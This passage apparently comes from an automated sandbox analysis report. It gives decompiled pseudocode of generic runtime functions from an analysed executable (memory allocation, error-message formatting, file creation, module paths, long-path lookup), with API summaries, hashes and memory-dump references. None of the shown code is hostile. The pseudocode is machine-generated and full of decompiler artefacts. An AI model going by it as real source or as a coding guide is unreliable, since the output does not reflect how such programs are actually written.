					_t18 = VirtualFree(_t31, 0, 0x8000);
					_t31 =  *_t10;
				}
				 *0x4bdb7c = 0x4bdb7c;
				 *0x004BDB80 = 0x4bdb7c;
				return _t18;
			}











                                                                    0x004052e2
                                                                    0x004052f9
                                                                    0x004052e7
                                                                    0x004052f2
                                                                    0x004052f7
                                                                    0x004052f7
                                                                    0x004052fd
                                                                    0x00405302
                                                                    0x00405307
                                                                    0x00405309
                                                                    0x0040530e
                                                                    0x00405311
                                                                    0x0040531a
                                                                    0x0040531d
                                                                    0x00405320
                                                                    0x00405320
                                                                    0x00405323
                                                                    0x00405325
                                                                    0x00405328
                                                                    0x0040532d
                                                                    0x00405332
                                                                    0x00405332
                                                                    0x00405334
                                                                    0x00405336
                                                                    0x00405336
                                                                    0x00405339
                                                                    0x0040533c
                                                                    0x0040533c
                                                                    0x00405341
                                                                    0x00405352
                                                                    0x00405357
                                                                    0x00405359
                                                                    0x0040535e
                                                                    0x00405375
                                                                    0x00405363
                                                                    0x0040536e
                                                                    0x00405373
                                                                    0x00405373
                                                                    0x00405379
                                                                    0x0040537b
                                                                    0x00405382

                                                                    APIs
                                                                    • VirtualFree.KERNEL32(004BBAD8,00000000,00008000,?,?,?,?,004053D4,0040CB76,00000000,0040CB94), ref: 004052F2
                                                                    • VirtualFree.KERNEL32(004BDB7C,00000000,00008000,004BBAD8,00000000,00008000,?,?,?,?,004053D4,0040CB76,00000000,0040CB94), ref: 0040536E
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FreeVirtual
                                                                    • String ID:
                                                                    • API String ID: 1263568516-0
                                                                    • Opcode ID: 2ac254642d4a9788115c799da738c06d3b344f11962515fad3d8dec7c1c1ac76
                                                                    • Instruction ID: 8dfda0fc8014d777c4f42bdf36328f4fb77b4e1ecbcf9529c7d2d9386e1eba40
                                                                    • Opcode Fuzzy Hash: 2ac254642d4a9788115c799da738c06d3b344f11962515fad3d8dec7c1c1ac76
                                                                    • Instruction Fuzzy Hash: A5116D71A046008FC7689F199840B67BBE4EB88754F15C0BFE549EB791D7B8AC018F9C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004232EC, Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E004232EC(long __eax, void* __edx) {
				short _v2052;
				signed int _t7;
				void* _t10;
				signed int _t16;
				void* _t17;

				_t10 = __edx;
				_t7 = FormatMessageW(0x3200, 0, __eax, 0,  &_v2052, 0x400, 0); // executed
				while(_t7 > 0) {
					_t16 =  *(_t17 + _t7 * 2 - 2) & 0x0000ffff;
					if(_t16 <= 0x20) {
						L1:
						_t7 = _t7 - 1;
						__eflags = _t7;
						continue;
					} else {
						_t20 = _t16 - 0x2e;
						if(_t16 == 0x2e) {
							goto L1;
						}
					}
					break;
				}
				return E00407BA8(_t10, _t7, _t17, _t20);
			}








                                                                    0x004232f3
                                                                    0x0042330b
                                                                    0x00423313
                                                                    0x00423317
                                                                    0x00423320
                                                                    0x00423312
                                                                    0x00423312
                                                                    0x00423312
                                                                    0x00000000
                                                                    0x00423322
                                                                    0x00423322
                                                                    0x00423326
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00423326
                                                                    0x00000000
                                                                    0x00423320
                                                                    0x00423339

                                                                    APIs
                                                                    • FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000400,00000000,00000000,00423C1E,00000000,00423C6F,?,00423E28), ref: 0042330B
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FormatMessage
                                                                    • String ID:
                                                                    • API String ID: 1306739567-0
                                                                    • Opcode ID: 8c28d4cd2feba8420b72e2c8323dac74420019247290cbce7f55a68a80108edc
                                                                    • Instruction ID: 75fedbff241bec6efc8727d26b236f8c34027f11b3bdd8370f626a5f6d270aaf
                                                                    • Opcode Fuzzy Hash: 8c28d4cd2feba8420b72e2c8323dac74420019247290cbce7f55a68a80108edc
                                                                    • Instruction Fuzzy Hash: 89E0D86075432121F624A9052C03B7B2129A7C0B12FE084367A80DE3D5DEADAF55525E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00422A18, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 31%
                                                                    			E00422A18(void* __eax, void* __ebx, void* __ecx, void* __eflags) {
				char _v8;
				intOrPtr _t21;
				intOrPtr _t24;

				_push(0);
				_push(_t24);
				_push(0x422a5e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t24;
				E004229AC(__eax, __ecx,  &_v8, __eflags);
				GetFileAttributesW(E004084EC(_v8)); // executed
				_pop(_t21);
				 *[fs:eax] = _t21;
				_push(E00422A65);
				return E00407A20( &_v8);
			}






                                                                    0x00422a1b
                                                                    0x00422a22
                                                                    0x00422a23
                                                                    0x00422a28
                                                                    0x00422a2b
                                                                    0x00422a33
                                                                    0x00422a41
                                                                    0x00422a4a
                                                                    0x00422a4d
                                                                    0x00422a50
                                                                    0x00422a5d

                                                                    APIs
                                                                    • GetFileAttributesW.KERNEL32(00000000,00000000,00422A5E,?,?,00000000,?,00422A71,00422DE2,00000000,00422E27,?,?,00000000,00000000), ref: 00422A41
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    • Opcode ID: 8cd9a521966ca01502d57987e2d96a70fbf8ec2bcb71e07358b87aea606a80f7
                                                                    • Instruction ID: ce0c41168f735205187e46b6c3e9294348714fcf51f30dd0002a5427be662740
                                                                    • Opcode Fuzzy Hash: 8cd9a521966ca01502d57987e2d96a70fbf8ec2bcb71e07358b87aea606a80f7
                                                                    • Instruction Fuzzy Hash: D7E09231704308BBD721EB76DE9291AB7ECD788700BA14876B500E7682E6B86E108418
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00423DA8, Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00423DA8(signed int __ecx, void* __edx, signed char _a4, signed char _a8) {
				void* _t17;

				_t17 = CreateFileW(E004084EC(__edx),  *(0x4b92e0 + (_a8 & 0x000000ff) * 4),  *(0x4b92ec + (_a4 & 0x000000ff) * 4), 0,  *(0x4b92fc + (__ecx & 0x000000ff) * 4), 0x80, 0); // executed
				return _t17;
			}




                                                                    0x00423de5
                                                                    0x00423ded

                                                                    APIs
                                                                    • CreateFileW.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00423DE5
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: dd9159e21b70a0e7bcb8d3c3b5b03a1c2ffc365921e6ade8a7c7864e99aae5ed
                                                                    • Instruction ID: 37fe8146f2431012b4276926014d9d5fd10bf57e8855788e2bc853c5fce69268
                                                                    • Opcode Fuzzy Hash: dd9159e21b70a0e7bcb8d3c3b5b03a1c2ffc365921e6ade8a7c7864e99aae5ed
                                                                    • Instruction Fuzzy Hash: 81E048716441283FD6149ADE7C91F76779C9709754F404563F684D7281C4A59D1086FC
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00409FA8, Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00409FA8(void* __eax) {
				short _v532;
				void* __ebx;
				void* __esi;
				intOrPtr _t14;
				void* _t16;
				void* _t18;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t16 = __eax;
				_t22 =  *((intOrPtr*)(__eax + 0x10));
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					GetModuleFileNameW( *(__eax + 4),  &_v532, 0x20a);
					_t14 = E0040B234(_t21, _t16, _t18, _t19, _t22); // executed
					_t20 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t20;
					if(_t20 == 0) {
						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
					}
				}
				return  *((intOrPtr*)(_t16 + 0x10));
			}












                                                                    0x00409fb0
                                                                    0x00409fb2
                                                                    0x00409fb6
                                                                    0x00409fc6
                                                                    0x00409fcf
                                                                    0x00409fd4
                                                                    0x00409fd6
                                                                    0x00409fdb
                                                                    0x00409fe0
                                                                    0x00409fe0
                                                                    0x00409fdb
                                                                    0x00409fee

                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(?,?,0000020A), ref: 00409FC6
                                                                      • Part of subcall function 0040B234: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B270
                                                                      • Part of subcall function 0040B234: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B2C1
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileModuleName$LibraryLoad
                                                                    • String ID:
                                                                    • API String ID: 4113206344-0
                                                                    • Opcode ID: 2301add7ea149dd4fbebfdf59b7b3942b6e3d1df22e9777a155c308e994de31e
                                                                    • Instruction ID: 1beb63cefa55d3dba2b36e2095187d50c135a0cf4330adb642bee8d6847d8901
                                                                    • Opcode Fuzzy Hash: 2301add7ea149dd4fbebfdf59b7b3942b6e3d1df22e9777a155c308e994de31e
                                                                    • Instruction Fuzzy Hash: 7BE0C971A013119BCB10DE58C8C5A4A3798AB08754F044AA6AD24DF387D3B5DD1487D5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00423ED8, Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00423ED8(intOrPtr* __eax) {
				int _t4;
				intOrPtr* _t7;

				_t7 = __eax;
				_t4 = SetEndOfFile( *(__eax + 4)); // executed
				if(_t4 == 0) {
					return E00423CAC( *_t7);
				}
				return _t4;
			}





                                                                    0x00423ed9
                                                                    0x00423edf
                                                                    0x00423ee6
                                                                    0x00000000
                                                                    0x00423eea
                                                                    0x00423ef0

                                                                    APIs
                                                                    • SetEndOfFile.KERNEL32(?,7FB80010,004B6358,00000000), ref: 00423EDF
                                                                      • Part of subcall function 00423CAC: GetLastError.KERNEL32(004237FC,00423D4F,?,?,00000000,?,004B5F76,00000001,00000000,00000002,00000000,004B659E,?,00000000,004B65E2), ref: 00423CAF
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ErrorFileLast
                                                                    • String ID:
                                                                    • API String ID: 734332943-0
                                                                    • Opcode ID: 09339d9670a81d77462708df034512c3e9d7a5ee9c38b49a5b5d33688a33920b
                                                                    • Instruction ID: ae15968ab9cd064c61534cde2c099b4aac4a7b80231ae1acb8e6de6fcc6ca8bf
                                                                    • Opcode Fuzzy Hash: 09339d9670a81d77462708df034512c3e9d7a5ee9c38b49a5b5d33688a33920b
                                                                    • Instruction Fuzzy Hash: 58C04C61300210478B04EEBBD5C190666E85B582157414466B904DB216E67DD9158615
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040CAA4, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E0040CAA4() {
				intOrPtr _v16;
				struct _SYSTEM_INFO* _t3;

				GetSystemInfo(_t3); // executed
				return _v16;
			}





                                                                    0x0040caa8
                                                                    0x0040cab4

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InfoSystem
                                                                    • String ID:
                                                                    • API String ID: 31276548-0
                                                                    • Opcode ID: 9dd1f6b5bb1b0da35443b21aa4a452d0333aba70165927044b368234b0936b7a
                                                                    • Instruction ID: 4f21eec972071caf62eebbeb90550a79e4d7a8082c8b53f17589c9beddeb5e45
                                                                    • Opcode Fuzzy Hash: 9dd1f6b5bb1b0da35443b21aa4a452d0333aba70165927044b368234b0936b7a
                                                                    • Instruction Fuzzy Hash: CDA012984088002AC404AB194C4340F39C819C1114FC40224745CB62C2E61D866403DB
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00403BCC, Relevance: 1.3, APIs: 1, Instructions: 41memoryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00403BCC(signed int __eax) {
				void* _t4;
				intOrPtr _t7;
				signed int _t8;
				void** _t10;
				void* _t12;
				void* _t14;

				_t8 = __eax;
				E00403B60(__eax);
				_t4 = VirtualAlloc(0, 0x13fff0, 0x1000, 4); // executed
				if(_t4 == 0) {
					 *0x4bbaf0 = 0;
					return 0;
				} else {
					_t10 =  *0x4bbadc; // 0x4bbad8
					_t14 = _t4;
					 *_t14 = 0x4bbad8;
					 *0x4bbadc = _t4;
					 *(_t14 + 4) = _t10;
					 *_t10 = _t4;
					_t12 = _t14 + 0x13fff0;
					 *((intOrPtr*)(_t12 - 4)) = 2;
					 *0x4bbaf0 = 0x13ffe0 - _t8;
					_t7 = _t12 - _t8;
					 *0x4bbaec = _t7;
					 *(_t7 - 4) = _t8 | 0x00000002;
					return _t7;
				}
			}









                                                                    0x00403bce
                                                                    0x00403bd0
                                                                    0x00403be3
                                                                    0x00403bea
                                                                    0x00403c3c
                                                                    0x00403c45
                                                                    0x00403bec
                                                                    0x00403bec
                                                                    0x00403bf2
                                                                    0x00403bf4
                                                                    0x00403bfa
                                                                    0x00403bff
                                                                    0x00403c02
                                                                    0x00403c06
                                                                    0x00403c11
                                                                    0x00403c1e
                                                                    0x00403c26
                                                                    0x00403c28
                                                                    0x00403c35
                                                                    0x00403c39
                                                                    0x00403c39

                                                                    APIs
                                                                    • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,000001A3,004041E3,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000), ref: 00403BE3
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    • Opcode ID: cb8f292e3956ad7a1a5e0c92f19b435d8be5366ce3ed5ca5418bf36ecf0e0e1a
                                                                    • Instruction ID: ee114c9f451a66722181258b66a673b4223530c98f306d9f720d31c7abdd50f3
                                                                    • Opcode Fuzzy Hash: cb8f292e3956ad7a1a5e0c92f19b435d8be5366ce3ed5ca5418bf36ecf0e0e1a
                                                                    • Instruction Fuzzy Hash: 71F087F2F002404FE7249F799D40742BAE8E709315B10827EE908EB799E7F488018B88
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00403CF6, Relevance: 1.3, APIs: 1, Instructions: 41COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 96%
                                                                    			E00403CF6(void* __eax) {
				struct _MEMORY_BASIC_INFORMATION _v44;
				void* _v48;
				void* _t13;
				int _t20;
				void* _t22;
				signed int _t26;
				signed int _t29;
				signed int _t30;
				void* _t34;
				intOrPtr _t35;
				signed int _t39;
				void* _t41;
				void* _t42;

				_push(_t29);
				_t42 = _t41 + 0xffffffdc;
				_t34 = __eax - 0x10;
				E00403C48();
				_t13 = _t34;
				 *_t42 =  *_t13;
				_v48 =  *((intOrPtr*)(_t13 + 4));
				_t26 =  *(_t13 + 0xc);
				if((_t26 & 0x00000008) != 0) {
					_t22 = _t34;
					_t39 = _t26 & 0xfffffff0;
					_t30 = 0;
					while(1) {
						VirtualQuery(_t22,  &_v44, 0x1c);
						if(VirtualFree(_t22, 0, 0x8000) == 0) {
							break;
						}
						_t35 = _v44.RegionSize;
						if(_t39 > _t35) {
							_t39 = _t39 - _t35;
							_t22 = _t22 + _t35;
							continue;
						}
						goto L10;
					}
					_t30 = _t30 | 0xffffffff;
				} else {
					_t20 = VirtualFree(_t34, 0, 0x8000); // executed
					if(_t20 == 0) {
						_t30 = _t29 | 0xffffffff;
					} else {
						_t30 = 0;
					}
				}
				L10:
				if(_t30 == 0) {
					 *_v48 =  *_t42;
					 *( *_t42 + 4) = _v48;
				}
				 *0x4bdb78 = 0;
				return _t30;
			}
















                                                                    0x00403cfa
                                                                    0x00403cfc
                                                                    0x00403d01
                                                                    0x00403d04
                                                                    0x00403d09
                                                                    0x00403d0d
                                                                    0x00403d13
                                                                    0x00403d17
                                                                    0x00403d1d
                                                                    0x00403d39
                                                                    0x00403d3d
                                                                    0x00403d40
                                                                    0x00403d42
                                                                    0x00403d4a
                                                                    0x00403d5e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403d65
                                                                    0x00403d6b
                                                                    0x00403d6d
                                                                    0x00403d6f
                                                                    0x00000000
                                                                    0x00403d6f
                                                                    0x00000000
                                                                    0x00403d6b
                                                                    0x00403d60
                                                                    0x00403d1f
                                                                    0x00403d27
                                                                    0x00403d2e
                                                                    0x00403d34
                                                                    0x00403d30
                                                                    0x00403d30
                                                                    0x00403d30
                                                                    0x00403d2e
                                                                    0x00403d73
                                                                    0x00403d75
                                                                    0x00403d7e
                                                                    0x00403d87
                                                                    0x00403d87
                                                                    0x00403d8a
                                                                    0x00403d9a

                                                                    APIs
                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00403D27
                                                                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00403D4A
                                                                    • VirtualFree.KERNEL32(?,00000000,00008000,?,?,0000001C), ref: 00403D57
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Virtual$Free$Query
                                                                    • String ID:
                                                                    • API String ID: 778034434-0
                                                                    • Opcode ID: 70118730a538275f8eba95c50282fe5a7e92951222106072b386c800723d93a4
                                                                    • Instruction ID: 6789628300bf7aa479fe1b8b627d7daf3441881ad106b622f2e79b23e4dc796b
                                                                    • Opcode Fuzzy Hash: 70118730a538275f8eba95c50282fe5a7e92951222106072b386c800723d93a4
                                                                    • Instruction Fuzzy Hash: C5F06D353046005FD311DF1AC844B17BBE9EFC5711F15C67AE888973A1E635DD018796
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    Function 0040A928, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 140stringlibraryfileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 78%
                                                                    			E0040A928(short* __eax, intOrPtr __edx) {
				short* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v20;
				struct _WIN32_FIND_DATAW _v612;
				short _v1134;
				signed int _t50;
				signed int _t51;
				void* _t55;
				signed int _t88;
				signed int _t89;
				intOrPtr* _t90;
				signed int _t101;
				signed int _t102;
				short* _t112;
				struct HINSTANCE__* _t113;
				short* _t115;
				short* _t116;
				void* _t117;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_t113 = GetModuleHandleW(L"kernel32.dll");
				if(_t113 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t115 = _v8 + 4;
						goto L10;
					} else {
						if( *((short*)(_v8 + 2)) == 0x5c) {
							_t116 = E0040A904(_v8 + 4);
							if( *_t116 != 0) {
								_t14 = _t116 + 2; // 0x2
								_t115 = E0040A904(_t14);
								if( *_t115 != 0) {
									L10:
									_t88 = _t115 - _v8;
									_t89 = _t88 >> 1;
									if(_t88 < 0) {
										asm("adc ebx, 0x0");
									}
									_t43 = _t89 + 1;
									if(_t89 + 1 <= 0x105) {
										E0040A34C( &_v1134, _v8, _t43);
										while( *_t115 != 0) {
											_t112 = E0040A904(_t115 + 2);
											_t50 = _t112 - _t115;
											_t51 = _t50 >> 1;
											if(_t50 < 0) {
												asm("adc eax, 0x0");
											}
											if(_t51 + _t89 + 1 <= 0x105) {
												_t55 =  &_v1134 + _t89 + _t89;
												_t101 = _t112 - _t115;
												_t102 = _t101 >> 1;
												if(_t101 < 0) {
													asm("adc edx, 0x0");
												}
												E0040A34C(_t55, _t115, _t102 + 1);
												_v20 = FindFirstFileW( &_v1134,  &_v612);
												if(_v20 != 0xffffffff) {
													FindClose(_v20);
													if(lstrlenW( &(_v612.cFileName)) + _t89 + 1 + 1 <= 0x105) {
														 *((short*)(_t117 + _t89 * 2 - 0x46a)) = 0x5c;
														E0040A34C( &_v1134 + _t89 + _t89 + 2,  &(_v612.cFileName), 0x105 - _t89 - 1);
														_t89 = _t89 + lstrlenW( &(_v612.cFileName)) + 1;
														_t115 = _t112;
														continue;
													}
												}
											}
											goto L24;
										}
										E0040A34C(_v8,  &_v1134, _v12);
									}
								}
							}
						}
					}
				} else {
					_t90 = GetProcAddress(_t113, "GetLongPathNameW");
					if(_t90 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v1134);
						_push(_v8);
						if( *_t90() == 0) {
							goto L4;
						} else {
							E0040A34C(_v8,  &_v1134, _v12);
						}
					}
				}
				L24:
				return _v16;
			}






















                                                                    0x0040a934
                                                                    0x0040a937
                                                                    0x0040a93d
                                                                    0x0040a94a
                                                                    0x0040a94e
                                                                    0x0040a98d
                                                                    0x0040a994
                                                                    0x0040a9d4
                                                                    0x00000000
                                                                    0x0040a996
                                                                    0x0040a99e
                                                                    0x0040a9af
                                                                    0x0040a9b5
                                                                    0x0040a9bb
                                                                    0x0040a9c3
                                                                    0x0040a9c9
                                                                    0x0040a9d7
                                                                    0x0040a9d9
                                                                    0x0040a9dc
                                                                    0x0040a9de
                                                                    0x0040a9e0
                                                                    0x0040a9e0
                                                                    0x0040a9e3
                                                                    0x0040a9eb
                                                                    0x0040a9fc
                                                                    0x0040aac3
                                                                    0x0040aa0e
                                                                    0x0040aa12
                                                                    0x0040aa14
                                                                    0x0040aa16
                                                                    0x0040aa18
                                                                    0x0040aa18
                                                                    0x0040aa23
                                                                    0x0040aa33
                                                                    0x0040aa37
                                                                    0x0040aa39
                                                                    0x0040aa3b
                                                                    0x0040aa3d
                                                                    0x0040aa3d
                                                                    0x0040aa43
                                                                    0x0040aa5b
                                                                    0x0040aa62
                                                                    0x0040aa68
                                                                    0x0040aa84
                                                                    0x0040aa86
                                                                    0x0040aaad
                                                                    0x0040aabf
                                                                    0x0040aac1
                                                                    0x00000000
                                                                    0x0040aac1
                                                                    0x0040aa84
                                                                    0x0040aa62
                                                                    0x00000000
                                                                    0x0040aa23
                                                                    0x0040aad9
                                                                    0x0040aad9
                                                                    0x0040a9eb
                                                                    0x0040a9c9
                                                                    0x0040a9b5
                                                                    0x0040a99e
                                                                    0x0040a950
                                                                    0x0040a95b
                                                                    0x0040a95f
                                                                    0x00000000
                                                                    0x0040a961
                                                                    0x0040a961
                                                                    0x0040a96c
                                                                    0x0040a970
                                                                    0x0040a975
                                                                    0x00000000
                                                                    0x0040a977
                                                                    0x0040a983
                                                                    0x0040a983
                                                                    0x0040a975
                                                                    0x0040a95f
                                                                    0x0040aade
                                                                    0x0040aae7

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,004162BC,?,?), ref: 0040A945
                                                                    • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040A956
                                                                    • FindFirstFileW.KERNEL32(?,?,kernel32.dll,004162BC,?,?), ref: 0040AA56
                                                                    • FindClose.KERNEL32(?,?,?,kernel32.dll,004162BC,?,?), ref: 0040AA68
                                                                    • lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,004162BC,?,?), ref: 0040AA74
                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,004162BC,?,?), ref: 0040AAB9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                    • String ID: GetLongPathNameW$\$kernel32.dll
                                                                    • API String ID: 1930782624-3908791685
